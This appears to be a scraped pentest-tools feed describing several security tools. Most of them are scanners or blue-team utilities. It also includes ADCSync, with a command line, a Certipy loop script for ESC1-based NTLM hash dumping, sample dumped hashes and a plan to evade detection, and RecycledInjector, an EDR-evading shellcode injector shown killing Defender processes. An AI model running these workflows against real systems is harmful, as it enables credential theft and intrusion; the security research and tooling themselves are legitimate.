    usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
    [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
    [--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
    [--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
    {slack} ...

    positional arguments:
    {slack}
    slack Send report to slack channel

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
    --tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
    Filter queries with specific tag
    --severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
    Filter queries by severity level (default: info)
    --queries-path QUERIES_PATH, -dp QUERIES_PATH
    Queries folder (default: library)
    --format {raw,json}, -f {raw,json}
    Report format (default: raw)

    Examples

    Retrieve all workflows and actions associated with the organization.

    raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

    Scrape all publicly accessible GitHub repositories.

    raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

    After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

    raven index --debug

    Now, we can generate a report using our query library.

    raven report --severity high --tag injection --tag unauthenticated

    Rate Limiting

    For effective rate limiting, you should supply a GitHub token. For authenticated users, the following rate limits apply (a quick way to check your remaining quota is sketched after the list):

    • Code search - 30 queries per minute
    • Any other API - 5000 per hour

    Research Knowledge Base

    Current Limitations

    • It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
    • It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
    • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
    • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

    Future Research Work

    • Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
    • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
    • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

    Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

    If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

    If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes

    By: Zion3R β€” January 19th 2024 at 11:30


    This is a tool I whipped up quickly to perform a DCSync utilizing ESC1. It is quite slow, but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.


    This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.

    python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

    ___ ____ ___________
    / | / __ \/ ____/ ___/__ ______ _____
    / /| | / / / / / \__ \/ / / / __ \/ ___/
    / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
    /_/ |_/_____/\____//____/\__, /_/ /_/\___/
    /____/

    Grabbing user certs:
    100%|β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 105/105 [02:18<00:00, 1.32s/it]
    THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
    THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
    THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
    THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
    THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
    THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
    THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
    THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
    THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

    Introduction

    ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.
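    In outline, that per-user loop looks roughly like the following. This is an illustrative sketch, not the actual adcsync.py; the Certipy flag names may differ between Certipy versions, and the user list would come from the parsed BloodHound JSON file.

    # Illustrative sketch of the per-user loop described above, not the actual
    # adcsync.py. Certipy flag names may differ between versions; 'users' would
    # come from the parsed BloodHound JSON file.
    import subprocess

    users = ["shirlee.saraann", "rosanne.nert"]        # parsed from the BloodHound dump
    domain, dc_ip = "THEGRID.LOCAL", "192.168.0.98"
    ca, template = "THEGRID-KFLYNN-DC-CA", "SmartCard"

    for user in users:
        # 1) Request a certificate for the target user via the ESC1-vulnerable template.
        subprocess.run(["certipy", "req", "-u", f"clu@{domain}", "-p", "theperfectsystem",
                        "-ca", ca, "-template", template, "-upn", f"{user}@{domain}",
                        "-target-ip", dc_ip, "-out", user], check=False)
        # 2) Authenticate with the resulting PFX to recover the user's NT hash.
        subprocess.run(["certipy", "auth", "-pfx", f"{user}.pfx", "-dc-ip", dc_ip],
                       check=False)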

    Installation

    git clone https://github.com/JPG0mez/adcsync.git
    cd adcsync
    pip3 install -r requirements.txt

    Usage

    To use this tool we need the following things:

    1. Valid Domain Credentials
    2. A user list from a bloodhound dump that will be passed in.
    3. A template vulnerable to ESC1 (Found with Certipy find)
    # python3 adcsync.py --help
    ___ ____ ___________
    / | / __ \/ ____/ ___/__ ______ _____
    / /| | / / / / / \__ \/ / / / __ \/ ___/
    / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
    /_/ |_/_____/\____//____/\__, /_/ /_/\___/
    /____/

    Usage: adcsync.py [OPTIONS]

    Options:
    -f, --file TEXT Input User List JSON file from Bloodhound [required]
    -o, --output TEXT NTLM Hash Output file [required]
    -ca TEXT Certificate Authority [required]
    -dc-ip TEXT IP Address of Domain Controller [required]
    -u, --user TEXT Username [required]
    -p, --password TEXT Password [required]
    -template TEXT Template Name vulnerable to ESC1 [required]
    -target-ip TEXT IP Address of the target machine [required]
    --help Show this message and exit.

    TODO

    • Support alternative authentication methods such as NTLM hashes and ccache files
    • Automatically run "certipy find" to find and grab templates vulnerable to ESC1
    • Add jitter and sleep options to avoid detection
    • Add type validation for all variables

    Acknowledgements

    • puzzlepeaches: Telling me to hurry up and write this
    • ly4k: For Certipy
    • WazeHell: For the script to set up the vulnerable AD environment used for testing


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    FalconHound - A Blue Team Multi-Tool. It Allows You To Utilize And Enhance The Power Of BloodHound In A More Automated Fashion

    By: Zion3R β€” January 18th 2024 at 11:30


    FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.

    One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.

    One of the hardest relationships to gather for BloodHound is the local group memberships and the session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.

    This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.

    Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.


    Other examples where FalconHound can be used:

    • Adding, removing or timing out sessions in the graph, based on logon and logoff events.
    • Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
    • Adding CVE information and whether there is a public exploit available to the graph.
    • All kinds of Azure activities.
    • Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
    • Adding new users, groups and computers to the graph.
    • Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.

    The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.

    A blog detailing more on why we developed it and some use case examples can be found here

    Index:

    Supported data sources and targets

    FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.

    Currently, FalconHound supports the following data sources and/or targets:

    • Azure Sentinel
    • Azure Sentinel Watchlists
    • Splunk
    • Microsoft Defender for Endpoint
    • Neo4j
    • MS Graph API (early stage)
    • CSV files

    Additional data sources and targets are planned for the future.

    At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.


    Installation

    Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the releases section.

    Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to create all credentials can be found here.

    The recommended way to run FalconHound is to run it as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.

    Requirements

    • BloodHound, or at least the Neo4j database for now.
    • A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
    • Credentials for each endpoint you want to talk to, with the required permissions.

    Configuration

    FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.


    Usage

    Default run

    To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.

    ./falconhound -go

    List all enabled actions

    To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.

    ./falconhound -actionlist -go

    Run with a select set of actions

    To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.

    ./falconhound -ids action1,action2,action3 -go

    Run with a different config file

    By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.

    ./falconhound -go -config /path/to/config.yml

    Run with a different actions folder

    By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.

    ./falconhound -go -actions-dir /path/to/actions

    Run with credentials from a keyvault

    By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.

    ./falconhound -go -keyvault

    Actions

    Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.

    Action folder structure

    The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.

    The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.

    Action files

    All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.

    There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.

    While most items will be fairly self-explanatory, there are some important things to note about actions:

    Enabled

    As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.

    Enabled: true

    Debug

    This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.

    Debug: false

    Query

    The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.

    Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:

    MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) 
    RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}

    Targets

    Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.

    CSV

      - Name: CSV
        Enabled: true
        Path: path/to/filename.csv

    Neo4j

    The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields fields are configured below.

      - Name: Neo4j
        Enabled: true
        Query: |
          MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
        Parameters:
          Computer: Computer
          TargetUserSid: TargetUserSid
          Timestamp: Timestamp

    The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.

    Sentinel

    The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

    This is also why query output needs to be controlled; you might otherwise flood your target.

      - Name: Sentinel
        Enabled: true

    Sentinel Watchlists

    The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.

      - Name: Watchlist
        Enabled: true
        WatchlistName: FH_MDE_Exploitable_Machines
        DisplayName: MDE Exploitable Machines
        SearchKey: DeviceName
        Overwrite: true

    The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.

    The SearchKey field is the column that will be used as the search key.

    The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.

    Splunk

    Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

      - Name: Splunk
        Enabled: true

    Azure Data Explorer

    Like Sentinel, the ADX target will write the results of the query to an ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

      - Name: ADX
        Enabled: true
        Table: "name"

    Extensions to the graph

    Relationship: HadSession

    Once a session has ended, it would have to be removed from the graph, but this felt like a waste of information. So instead of removing the session, it is added as a relationship between the computer and the user. The relationship is called HadSession and has the following properties:

    {
    "till": "2021-08-31T14:00:00Z",
    "source": "falconhound",
    "reason": "logoff"
    }

    This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.

    Properties

    FalconHound will add the following properties to nodes in the graph:

    Computer:
    β€’ 'exploitable': true/false
    β€’ 'exploits': list of CVEs
    β€’ 'exposed': true/false
    β€’ 'ports': list of ports accessible from the internet
    β€’ 'alertids': list of alert ids

    Credential management

    The currently supported ways of providing FalconHound with credentials are:

    • Via the config.yml file on disk.
    • Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
    • Mixed mode.

    Config.yml

    The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practice is to separate the apps on a per-service level, but you can use one AppID/AppSecret for all Azure-based actions.

    The required permissions for your AppID/AppSecret are listed here.

    Keyvault

    A more secure way of storing the credentials would be to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on an AppID/AppSecret, which needs to be configured in the config.yml file.

    The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role on this Keyvault. This role only allows reading the secrets, not even listing them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.

    The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.

    SentinelAppSecret
    SentinelAppID
    SentinelTenantID
    SentinelTargetTable
    SentinelResourceGroup
    SentinelSharedKey
    SentinelSubscriptionID
    SentinelWorkspaceID
    SentinelWorkspaceName
    MDETenantID
    MDEAppID
    MDEAppSecret
    Neo4jUri
    Neo4jUsername
    Neo4jPassword
    GraphTenantID
    GraphAppID
    GraphAppSecret
    AdxTenantID
    AdxAppID
    AdxAppSecret
    AdxClusterURL
    AdxDatabase
    SplunkUrl
    SplunkApiToken
    SplunkIndex
    SplunkApiPort
    SplunkHecToken
    SplunkHecPort
    BHUrl
    BHTokenID
    BHTokenKey
    LogScaleUrl
    LogScaleToken
    LogScaleRepository

    Once configured you can add the -keyvault parameter while starting FalconHound.

    Mixed mode / fallback

    When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.

    Deployment

    FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.

    All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.

    Also, there might be some overlap, for instance with the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the ones from MDE. This assumes you have MDE and Sentinel connected and most machines are onboarded into MDE.

    Sharphound / Azurehound

    While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to complement the collection and remove the moment-in-time problem of the periodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.

    It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.

    License

    This project is licensed under the BSD3 License - see the LICENSE file for details.

    This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Windiff - Web-based Tool That Allows Comparing Symbol, Type And Syscall Information Of Microsoft Windows Binaries Across Different Versions Of The OS

    By: Zion3R β€” November 30th 2023 at 11:30


    WinDiff is an open-source web-based tool that allows browsing and comparing symbol, type and syscall information of Microsoft Windows binaries across different versions of the operating system. The binary database is automatically updated to include information from the latest Windows updates (including Insider Preview).

    It was inspired by ntdiff and made possible with the help of Winbindex.


    How It Works

    WinDiff is made of two parts: a CLI tool written in Rust and a web frontend written in TypeScript using the Next.js framework.

    The CLI tool is used to generate compressed JSON databases out of a configuration file and relies on Winbindex to find and download the required PEs (and PDBs). Types are reconstructed using resym. The idea behind the CLI tool is to be able to easily update and regenerate databases as new versions of Windows are released. The CLI tool's code is in the windiff_cli directory.

    The frontend is used to visualize the data generated by the CLI tool, in a user-friendly way. The frontend follows the same principle as ntdiff, as it allows browsing information extracted from official Microsoft PEs and PDBs for certain versions of Microsoft Windows and also allows comparing this information between versions. The frontend's code is in the windiff_frontend directory.

    A scheduled GitHub action fetches new updates from Winbindex every day and updates the configuration file used to generate the live version of WinDiff. Currently, because of storage and compute limitations (free plans), only KB and Insider Preview updates less than one year old are kept for the live version. You can of course rebuild a local version of WinDiff yourself, without those limitations, if you need to. See the next section for that.

    Note: Winbindex doesn't provide unique download links for 100% of the indexed files, so it might happen that some PEs' information is unavailable in WinDiff because of that. However, as soon as these PEs are on VirusTotal, Winbindex will be able to provide unique download links for them and they will then be integrated into WinDiff automatically.

    How to Build

    Prerequisites

    • Rust 1.68 or superior
    • Node.js 16.8 or superior

    Command-Line

    The full build of WinDiff is "self-documented" in ci/build_frontend.sh, which is the build script used to build the live version of WinDiff. Here's what's inside:

    # Resolve the project's root folder
    PROJECT_ROOT=$(git rev-parse --show-toplevel)

    # Generate databases
    cd "$PROJECT_ROOT/windiff_cli"
    cargo run --release "$PROJECT_ROOT/ci/db_configuration.json" "$PROJECT_ROOT/windiff_frontend/public/"

    # Build the frontend
    cd "$PROJECT_ROOT/windiff_frontend"
    npm ci
    npm run build

    The configuration file used to generate the data for the live version of WinDiff is located here: ci/db_configuration.json, but you can customize it or use your own. PRs aimed at adding new binaries to track in the live configuration are welcome.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    RecycledInjector - Native Syscalls Shellcode Injector

    By: Zion3R β€” October 12th 2023 at 18:55


    (Currently) Fully Undetected same-process native/.NET assembly shellcode injector based on RecycledGate by thefLink, which is also based on HellsGate + HalosGate + TartarusGate to ensure undetectable native syscalls even if one technique fails.

    To remain stealthy and keep entropy on the final executable low, do ensure that shellcode is always loaded externally since most AV/EDRs won't check for signatures on non-executable or DLL files anyway.

    It is also important to note that the fully undetected part refers to the loading of the shellcode; the shellcode itself will still be subject to behavior monitoring, so make sure the loaded executable also makes use of defense evasion techniques (e.g., SharpKatz, which features DInvoke, instead of Mimikatz).


    Usage

    .\RecycledInjector.exe <path_to_shellcode_file>

    Proof of Concept

    This proof of concept leverages Terminator by ZeroMemoryEx to kill most security solutions/agents present on the system. It is used against Microsoft Defender for Endpoint EDR.

    On the left we inject the Terminator shellcode to load the vulnerable driver and kill MDE processes, and on the right is an example of loading and executing Invoke-Mimikatz remotely from memory, which is not stopped as there is no running security solution anymore on the system.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Caracal - Static Analyzer For Starknet Smart Contracts

    By: Zion3R β€” October 6th 2023 at 11:30


    Caracal is a static analyzer tool over the SIERRA representation for Starknet smart contracts.

    Features

    • Detectors to detect vulnerable Cairo code
    • Printers to report information
    • Taint analysis
    • Data flow analysis framework
    • Easy to run in Scarb projects

    Installation

    Precompiled binaries

    Precompiled binaries are available on our releases page. If you are using Cairo compiler 1.x.x, use the v0.1.x binary; if you are using Cairo compiler 2.x.x, use v0.2.x.

    Building from source

    You need the Rust compiler and Cargo. Building from git:

    cargo install --git https://github.com/crytic/caracal --profile release --force

    Building from a local copy:

    git clone https://github.com/crytic/caracal
    cd caracal
    cargo install --path . --profile release --force

    Usage

    List detectors:

    caracal detectors

    List printers:

    caracal printers

    Standalone

    To use caracal with a standalone Cairo file you need to pass the path to the corelib library, either with the --corelib CLI option or by setting the CORELIB_PATH environment variable. Run detectors:

    caracal detect path/file/to/analyze --corelib path/to/corelib/src

    Run printers:

    caracal print path/file/to/analyze --printer printer_to_use --corelib path/to/corelib/src

    Scarb

    If you have a project that uses Scarb you need to add the following in Scarb.toml:

    [[target.starknet-contract]]
    sierra = true

    [cairo]
    sierra-replace-ids = true

    Then pass the path to the directory where Scarb.toml resides. Run detectors:

    caracal detect path/to/dir

    Run printers:

    caracal print path/to/dir --printer printer_to_use

    Detectors

    Num Detector What it Detects Impact Confidence Cairo
    1 controlled-library-call Library calls with a user controlled class hash High Medium 1 & 2
    2 unchecked-l1-handler-from Detect L1 handlers without from address check High Medium 1 & 2
    3 felt252-overflow Detect user controlled operations with felt252 type, which is not overflow safe High Medium 1 & 2
    4 reentrancy Detect when a storage variable is read before an external call and written after Medium Medium 1 & 2
    5 read-only-reentrancy Detect when a view function read a storage variable written after an external call Medium Medium 1 & 2
    6 unused-events Events defined but not emitted Medium Medium 1 & 2
    7 unused-return Unused return values Medium Medium 1 & 2
    8 unenforced-view Function has view decorator but modifies state Medium Medium 1
    9 unused-arguments Unused arguments Low Medium 1 & 2
    10 reentrancy-benign Detect when a storage variable is written after an external call but not read before Low Medium 1 & 2
    11 reentrancy-events Detect when an event is emitted after an external call leading to out-of-order events Low Medium 1 & 2
    12 dead-code Private functions never used Low Medium 1 & 2

    The Cairo column represents the compiler version(s) for which the detector is valid.

    Printers

    • cfg: Export the CFG of each function to a .dot file
    • callgraph: Export function call graph to a .dot file

    How to contribute

    Check the wiki on the following topics:

    Limitations

    • Inlined functions are not handled correctly.
    • Since it's working over the SIERRA representation it's not possible to report where an error is in the source code but we can only report SIERRA instructions/what's available in a SIERRA program.


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Callisto - An Intelligent Binary Vulnerability Analysis Tool

    By: Zion3R β€” September 20th 2023 at 11:30


    Callisto is an intelligent automated binary vulnerability analysis tool. Its purpose is to autonomously decompile a provided binary and iterate through the pseudo code output looking for potential security vulnerabilities in that pseudo C code. Ghidra's headless decompiler is what drives the binary decompilation and analysis portion. The pseudo code analysis is initially performed by the Semgrep SAST tool and then transferred to GPT-3.5-Turbo for validation of Semgrep's findings, as well as potential identification of additional vulnerabilities.


    This tool's intended purpose is to assist with binary analysis and zero-day vulnerability discovery. The output aims to help the researcher identify potential areas of interest or vulnerable components in the binary, which can be followed up with dynamic testing for validation and exploitation. It certainly won't catch everything, but the double validation with Semgrep to GPT-3.5 aims to reduce false positives and allow a deeper analysis of the program.

    For those looking to just leverage the tool as a quick headless decompiler, the output.c file created will contain all the extracted pseudo code from the binary. This can be plugged into your own SAST tools or manually analyzed.
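    As a rough sketch of that Semgrep-then-GPT validation flow (this is not the actual callisto.py), the outline below assumes the pseudo code has already been written to output.c; the rules path is a placeholder and the API key is read from an environment variable here rather than the tool's config.txt.

    # Rough sketch of the Semgrep -> GPT-3.5-Turbo validation flow, not the actual
    # callisto.py. The rules path is a placeholder, and the API key is read from an
    # environment variable here instead of the tool's config.txt.
    import json
    import os
    import subprocess
    import requests

    # 1) Run Semgrep over the pseudo C code that Ghidra's headless decompiler produced.
    semgrep = subprocess.run(["semgrep", "--config", "rules/", "--json", "output.c"],
                             capture_output=True, text=True, check=False)
    findings = json.loads(semgrep.stdout).get("results", [])

    # 2) Ask GPT-3.5-Turbo to validate each flagged snippet.
    for finding in findings:
        snippet = finding["extra"].get("lines", "")
        resp = requests.post(
            "https://api.openai.com/v1/chat/completions",
            headers={"Authorization": f"Bearer {os.environ['OPENAI_API_KEY']}"},
            json={"model": "gpt-3.5-turbo",
                  "messages": [{"role": "user",
                                "content": f"Is this C pseudo code vulnerable? Explain briefly.\n\n{snippet}"}]},
            timeout=60,
        )
        print(finding["check_id"], "->", resp.json()["choices"][0]["message"]["content"])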

    I owe Marco Ivaldi @0xdea a huge thanks for his publicly released custom Semgrep C rules as well as his idea to automate vulnerability discovery using semgrep and pseudo code output from decompilers. You can read more about his research here: Automating binary vulnerability discovery with Ghidra and Semgrep

    Requirements:

    • If you want to use the GPT-3.5-Turbo feature, you must create an API token on OpenAI and save to the config.txt file in this folder
    • Ghidra
    • Semgrep - pip install semgrep
    • requirements.txt - pip install -r requirements.txt
    • Ensure the correct path to your Ghidra directory is set in the config.txt file

    To Run: python callisto.py -b <path_to_binary> -ai -o <path_to_output_file>

    • -ai => enable OpenAI GPT-3.5-Turbo Analysis. Will require placing a valid OpenAI API key in the config.txt file
    • -o => define an output file, if you want to save the output
    • -ai and -o are optional parameters
    • -all will run all functions through OpenAI Analysis, regardless of any Semgrep findings. This flag requires the prerequisite -ai flag
    • Ex. python callisto.py -b vulnProgram.exe -ai -o results.txt
    • Ex. (Running all functions through AI Analysis):
      python callisto.py -b vulnProgram.exe -ai -all -o results.txt

    Program Output Example:



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

